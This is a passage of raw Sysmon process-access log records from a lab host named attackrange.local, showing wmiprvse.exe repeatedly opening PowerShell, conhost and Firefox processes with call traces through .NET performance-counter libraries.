21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150933Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150932Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150931Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150930Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150929Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150928Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150927Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150926Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150925Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150924Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150923Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150922Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150921Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150920Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150919Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150918Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla 